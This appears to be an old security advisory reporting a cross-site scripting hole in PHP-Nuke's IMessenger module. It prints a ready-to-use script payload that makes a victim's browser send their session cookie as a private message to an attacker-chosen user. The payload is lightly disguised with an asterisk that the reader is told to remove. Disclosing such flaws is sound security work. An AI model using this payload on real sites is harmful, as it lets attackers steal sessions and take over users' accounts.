Serious Hole in IMessenger ( php-nuke )

[frog frog <leseulfrog () hotmail com>]

IMessenger is on http://www.SERVER.com/im.php?
action=Check+IM .

IM accepts the javascript.
If I send to a user or to the webmaster the script 

<s*cript>window.location.href='http://www.SERVER.c
om/im.php?username_to= [NICKNAME] &subject='+ 
document.cookie 
+'&message=message&action=send' ;</s*cript>

(without '*'), he will send back his cookie to the user 
NICKNAME.
One can so directly execute javascript on the 
connected user's computer.

frog-m@n